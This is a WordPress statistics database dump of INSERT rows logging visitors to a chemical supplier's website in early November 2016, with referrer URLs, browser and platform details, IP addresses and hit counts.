INSERT INTO `wp_statistics_visitor` VALUES (15010, '2016-11-02', 'https://www.miller-stephenson.com', 'Microsoft-WebDAV-MiniRedir', 'Unknown', '6.1.7601', '', '100.34.148.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15011, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15012, '2016-11-02', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '76.188.25.6', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15013, '2016-11-02', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0.1', '', '194.6.182.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15014, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiGyfin7orQAhVE92MKHVw6ArUQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '167.115.115.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15015, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjy26aP74rQAhXFYCYKHc4OD6QQFgguMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-52-radical-initiator%2F&usg=AFQjCNFreklW0x11g4z9AuGbNe6ZOMXXmw&sig2=sfXK3UapKpspcMDXyiZw-g', 'MSIE', 'Windows', '11.0', '', '209.113.208.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15016, '2016-11-02', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '69.17.141.206', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15017, '2016-11-02', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '173.13.105.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15018, '2016-11-02', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15019, '2016-11-02', 'https://kursy-ege.ru/', 'MSIE', 'Windows', '6.0', '', '134.249.53.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15020, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjw8IqD8YrQAhVrlFQKHRYtCC0QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '64.250.236.148', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15021, '2016-11-02', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '125.209.235.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15022, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '125.209.235.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15023, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi_usqe8orQAhXCVbwKHblLD2YQFgghMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'Safari', 'Macintosh', '6.2.8', '', '64.183.34.114', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15024, '2016-11-02', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '50.241.95.158', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15025, '2016-11-02', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '69.146.49.232', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15026, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiXk76V9IrQAhXI64MKHV62D1gQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '66.194.51.242', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15027, '2016-11-02', 'https://r.search.yahoo.com/_ylt=A0LEV2A0TBpYqaEA93tXNyoA;_ylu=X3oDMTEyMDNncGFtBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjE5MTBfMQRzZWMDc3I-/RV=2/RE=1478147252/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=TZjEhpO5cKBmKJplwU2JZ0a7Ors-', 'MSIE', 'Windows', '11.0', '', '24.52.64.146', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15028, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '50.62.208.38', '000', 65, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15029, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwir_tXF9YrQAhVLw4MKHY0-BFQQFggmMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '130.134.82.15', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15030, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '208.100.154.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15031, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '174.105.214.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15032, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15033, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.87', '', '150.212.85.72', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15034, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '206.31.45.254', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15035, '2016-11-02', 'https://ple.mschem.com/miller/pdf/MS-750,%20752.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '24.43.106.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15036, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '206.231.97.146', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15037, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '209.63.222.56', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15038, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '130.101.154.100', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15039, '2016-11-03', 'https://www.miller-stephenson.com/wp-admin/admin.php?page=site-migration-import', 'Chrome', 'Windows', '54.0.2840.71', '', '24.63.154.108', '000', 148, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15040, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '104.238.94.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15041, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '17.0', '', '104.238.94.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15042, '2016-11-03', 'https://www.miller-stephenson.com/wp-cron.php?doing_wp_cron=1478183861.4853849411010742187500', 'WordPress', 'Unknown', '4.6.1', '', '50.62.208.38', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15043, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '50.151.36.144', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15044, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.87', '', '50.151.36.144', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15045, '2016-11-03', 'https://www.google.ca/', 'Edge', 'Windows', '14.14393', '', '184.64.212.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15046, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '209.145.84.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15047, '2016-11-03', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15048, '2016-11-03', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '75.162.202.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15049, '2016-11-03', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwju3Yip6ozQAhXTTiYKHUW2D2AQFggbMAA&url=https%3A%2F%2Fwww.miller-stephenson.com%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '132.3.37.83', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15050, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.37.83', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15051, '2016-11-03', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20v;5FFwvMiY+VVAZIhL0mbtdTrnJhaxa0pa9sTJXZNFnh0=', 'MSIE', 'Windows', '11.0', '', '132.3.37.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15052, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.37.84', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15053, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.37.81', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15054, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.37.82', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15055, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.37.79', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15056, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.37.80', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15057, '2016-11-03', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.37.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15058, '2016-11-03', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.37.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15059, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '39.0.2171.95', '', '173.208.58.138', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15060, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '172.0.194.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15061, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.1.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15062, '2016-11-03', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiMmMPv7IzQAhWBfH4KHXFUADMYABAF&sig=AOD64_0iL44GjxsaB_dFkeaCT-9orGaVgw&rct=j&q=&ved=0ahUKEwjHhMDv7IzQAhXpslQKHY3NBYEQ0QwIIw&adurl=', 'MSIE', 'Windows', '11.0', '', '96.90.201.185', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15063, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '39.0.2171.95', '', '50.22.90.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15064, '2016-11-03', 'https://www.google.co.kr/', 'Chrome', 'Windows', '54.0.2840.87', '', '14.33.117.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15065, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '31.0.1650.63', '', '165.166.224.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15066, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15067, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '162.225.138.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15068, '2016-11-03', 'android-app://com.google.android.googlequicksearchbox/httpss/www.google.com', 'Chrome', 'Android', '54.0.2840.68', '', '47.148.101.98', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15069, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.106', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15070, '2016-11-03', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15071, '2016-11-03', 'https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwiAhtSk84zQAhVgHGMKHdMHChgQFghKMAY&url=https%3A%2F%2Fwww.miller-stephenson.com%2Fkrytox-product-selection-guide%2F&usg=AFQjCNEFFY35ZZxf0D7kNLQd_Gv3ylJEaQ&bvm=bv.137132246,d.cGc', 'MSIE', 'Windows', '11.0', '', '10.138.101.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15072, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.54.216.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15073, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.114.239.164', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15074, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '12.49.105.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15075, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15076, '2016-11-03', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiWmJHB9ozQAhWK4yYKHRJEA3gQFggbMAA&url=https%3A%2F%2Fwww.miller-stephenson.com%2Fchemicals%2Fmold-release-agents%2F&usg=AFQjCNHhgyC2pnZej0928BNtU-741d08wg&bvm=bv.137132246,d.eWE', 'Firefox', 'Windows', '21.0', '', '69.63.239.34', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15077, '2016-11-03', 'https://www.google.it/url?url=https://www.miller-stephenson.com/product/krytox-gpl-227/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwih8N-i9IzQAhXGSBQKHZHeB_AQFghGMAk&usg=AFQjCNGInqJl_SNNdPwWwDCkI_wMConymQ', 'MSIE', 'Windows', '9.0', '', '159.100.1.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15078, '2016-11-03', 'https://www.findeen.co.uk/epikure_3270_msds.html', 'Chrome', 'Windows', '54.0.2840.71', '', '5.254.65.204', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15079, '2016-11-03', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '38.0.2220.29', '', '216.119.142.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15080, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.106', '', '96.88.26.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15081, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '185.145.37.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15082, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '95.133.186.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15083, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.87', '', '209.63.222.56', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15084, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15085, '2016-11-03', 'https://www.google.ru/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '109.173.79.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15086, '2016-11-03', 'https://www.google.fr/', 'Chrome', 'Windows', '53.0.2785.101', '', '209.255.214.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15087, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15088, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.198.24.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15089, '2016-11-03', 'https://www.google.es/', 'Chrome', 'Windows', '54.0.2840.71', '', '84.120.140.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15090, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '130.101.154.90', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15091, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '76.8.142.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15092, '2016-11-03', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj2u5e7gY3QAhUKjmkKHVsXD2kYABAA&sig=AOD64_3uQM2wik57BwouxIRHmwX3rqYVzw&rct=j&q=&ved=0ahUKEwjPypK7gY3QAhXKz1QKHTsECqUQ0QwIGw&adurl=', 'MSIE', 'Windows', '11.0', '', '70.90.121.249', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15093, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '199.64.7.53', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15094, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '199.64.7.53', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15095, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.233.218.231', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15096, '2016-11-03', 'https://www.adsensecustomsearchads.com/', 'Chrome', 'Windows', '54.0.2840.87', '', '63.248.87.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15097, '2016-11-03', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjVhauvgo3QAhUDhywKHSjEDiUQFghQMAE&url=https%3A%2F%2Fwww.miller-stephenson.com%2Fproduct%2F157-fsl%2F&usg=AFQjCNGbgfl9cHc-ETJizWt_DmpR6ieaUA&bvm=bv.137132246,d.bGg', 'MSIE', 'Windows', '11.0', '', '169.148.251.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15098, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '169.146.191.10', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15099, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '205.215.194.146', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15100, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '66.211.223.226', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15101, '2016-11-03', 'https://www.documbase.com/Epon-1001F-MSDS.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '148.141.31.171', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15102, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.199.139.104', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15103, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 118, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15104, '2016-11-03', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjXm4PIhY3QAhUIbX4KHeJ6A60YABAA&sig=AOD64_1SV75TzQRMFp0RYmc5AT5S8hgbvw&rct=j&q=&ved=0ahUKEwiasv7HhY3QAhXHg1QKHVXQC1wQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '96.229.247.171', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15105, '2016-11-03', 'https://www.google.com/search', 'Chrome', 'Linux', '27.0.1453', '', '24.22.119.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15106, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15107, '2016-11-03', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '600.1.4', '', '209.124.206.214', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15108, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '204.76.197.133', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15109, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '23.228.168.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15110, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.37.78', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15111, '2016-11-03', 'https://www.google.de', 'Firefox', 'Windows', '45.0', '', '131.78.174.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15112, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '122.228.249.10', '000', 533, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15113, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.245.84', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15114, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '45.0.2454.85', '', '12.4.27.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15115, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '12.4.27.134', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15116, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '159.63.7.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15117, '2016-11-03', 'https://www.miller-stephenson.com/product/157-fsl/', 'Chrome', 'Windows', '53.0.2785.143', '', '157.204.1.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15118, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '50.176.39.48', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15119, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.16.181.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15120, '2016-11-03', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.26', '000', 58, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15121, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '68.109.244.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15122, '2016-11-03', 'https://miller-stephenson.com/wp-login.php', 'Chrome', 'Windows', '53.0.2785.143', '', '91.210.144.227', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15123, '2016-11-03', 'https://mmr.mschem.com/miller/pdf/MS-555,%20557.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '50.241.95.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15124, '2016-11-03', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwip9sGajo3QAhUP6WMKHZXjA44QFghIMAE&url=https%3A%2F%2Fwww.miller-stephenson.com%2Fchemicals%2Fconformal-coatings%2F&usg=AFQjCNF6BrACSYYrQwxy3XIrHbh4DG7M6A&bvm=bv.137132246,bs.1,d.eWE', 'MSIE', 'Windows', '11.0', '', '206.208.38.2', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15125, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.125', '', '83.111.209.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15126, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15127, '2016-11-03', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '87.135.45.144', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15128, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.65.164.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15129, '2016-11-03', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '65.157.77.67', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15130, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.1.93.254', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15131, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15132, '2016-11-03', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Chrome', 'Windows', '53.0.2785.116', '', '31.14.16.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15133, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15134, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '24.63.154.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15135, '2016-11-03', 'https://forums.pelicanparts.com/911-engine-rebuilding-forum/284737-complete-engine-sealant-thread-16.html', 'Chrome', 'Windows', '54.0.2840.87', '', '73.93.78.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15136, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '108.81.209.66', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15137, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.87', '', '184.177.74.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15138, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15139, '2016-11-03', 'https://www.google.com/search?ei=UnsbWMTwCsTXmwGF8pKACg&q=miller+stephenson+907+epoxy&oq=miller+and+stephenson+907&gs_l=mobile-gws-serp.1.1.0i22i30k1l3.2238.3925.0.5345.4.4.0.0.0.0.442.1347.0j1j0j2j1.4.0....0...1c.1.64.mobile-gws-serp..0.4.1341.j7h3_hXjGAM', 'Chrome', 'Android', '44.0.2403.133', '', '174.197.10.137', '000', 3, 0); 
